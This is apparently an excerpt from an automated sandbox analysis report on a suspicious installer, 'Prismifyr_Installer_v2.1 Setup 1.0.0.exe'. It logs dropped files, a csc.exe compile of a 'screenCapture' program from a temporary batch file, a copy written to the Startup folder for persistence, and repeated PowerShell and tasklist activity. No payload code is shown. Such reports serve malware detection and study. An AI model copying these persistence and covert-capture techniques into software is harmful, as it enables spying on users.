Source: Binary string: C:\projects\src\out\Default\electron.exe.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdbGCTL source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2395663067.0000000005221000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdb_base = "{}.{}.pdb".format(pdb_base, TARGET_TYPE_EXT[target_dict["type"]]) source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461234245.0000000000849000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ** for all file descriptors with rbu_file.pDb!=0. If the argument has source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: config_name, self.ExpandSpecial, output + ".pdb" source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ** rbu_file.pDb!=0. source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2388748403.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392116421.0000000005C20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2388942202.00000000055C0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /win32manifest:"app.manifest" /out:"screenCapture_1.3.2.exe" "C:\Users\user\AppData\Local\Temp\SCREEN~1\SCREEN~1.BAT"
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll.0.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll.0.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .retplne
Source: vulkan-1.dll.0.drStatic PE information: section name: _RDATA
Source: ffmpeg.dll.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll.0.drStatic PE information: section name: _RDATA
Source: libEGL.dll.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll.0.drStatic PE information: section name: .retplne
Source: libEGL.dll.0.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll.0.drStatic PE information: section name: _RDATA
Source: Prismifyr_Installer_v2.1.exe.0.drStatic PE information: section name: .gxfg
Source: Prismifyr_Installer_v2.1.exe.0.drStatic PE information: section name: .retplne
Source: Prismifyr_Installer_v2.1.exe.0.drStatic PE information: section name: .rodata
Source: Prismifyr_Installer_v2.1.exe.0.drStatic PE information: section name: CPADinfo
Source: Prismifyr_Installer_v2.1.exe.0.drStatic PE information: section name: LZMADEC
Source: Prismifyr_Installer_v2.1.exe.0.drStatic PE information: section name: _RDATA
Source: Prismifyr_Installer_v2.1.exe.0.drStatic PE information: section name: malloc_h
Source: Prismifyr_Installer_v2.1.exe.0.drStatic PE information: section name: prot
Source: ffmpeg.dll0.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll0.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll0.0.drStatic PE information: section name: _RDATA
Source: libEGL.dll0.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll0.0.drStatic PE information: section name: .retplne
Source: libEGL.dll0.0.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll0.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll0.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll0.0.drStatic PE information: section name: _RDATA
Source: Prismifyr_Installer_v2.1.exe0.0.drStatic PE information: section name: .gxfg
Source: Prismifyr_Installer_v2.1.exe0.0.drStatic PE information: section name: .retplne
Source: Prismifyr_Installer_v2.1.exe0.0.drStatic PE information: section name: .rodata
Source: Prismifyr_Installer_v2.1.exe0.0.drStatic PE information: section name: CPADinfo
Source: Prismifyr_Installer_v2.1.exe0.0.drStatic PE information: section name: LZMADEC
Source: Prismifyr_Installer_v2.1.exe0.0.drStatic PE information: section name: _RDATA
Source: Prismifyr_Installer_v2.1.exe0.0.drStatic PE information: section name: malloc_h
Source: Prismifyr_Installer_v2.1.exe0.0.drStatic PE information: section name: prot
Source: Prismifyr_Installer_v2.1.exe.5.drStatic PE information: section name: .gxfg
Source: Prismifyr_Installer_v2.1.exe.5.drStatic PE information: section name: .retplne
Source: Prismifyr_Installer_v2.1.exe.5.drStatic PE information: section name: .rodata
Source: Prismifyr_Installer_v2.1.exe.5.drStatic PE information: section name: CPADinfo
Source: Prismifyr_Installer_v2.1.exe.5.drStatic PE information: section name: LZMADEC
Source: Prismifyr_Installer_v2.1.exe.5.drStatic PE information: section name: _RDATA
Source: Prismifyr_Installer_v2.1.exe.5.drStatic PE information: section name: malloc_h
Source: Prismifyr_Installer_v2.1.exe.5.drStatic PE information: section name: prot
Source: d9f7e9ec-5589-4098-b546-c97c7020ff02.tmp.node.5.drStatic PE information: section name: _RDATA
Source: 1b6e99aa-5e17-4930-922d-0fcfed46e003.tmp.node.5.drStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exeJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\StdUtils.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile created: C:\Users\user\AppData\Local\Temp\d9f7e9ec-5589-4098-b546-c97c7020ff02.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile created: C:\Users\user\AppData\Local\Temp\1b6e99aa-5e17-4930-922d-0fcfed46e003.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\SpiderBanner.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\Prismifyr_Installer_v2.1.exeJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\ffmpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile created: C:\Users\user\AppData\Local\Temp\d9f7e9ec-5589-4098-b546-c97c7020ff02.tmp.nodeJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile created: C:\Users\user\AppData\Local\Temp\1b6e99aa-5e17-4930-922d-0fcfed46e003.tmp.nodeJump to dropped file
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeFile created: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\LICENSE.electron.txtJump to behavior

Boot Survival

barindex
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exeJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Prismifyr_Installer_v2.1 Setup 1.0.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
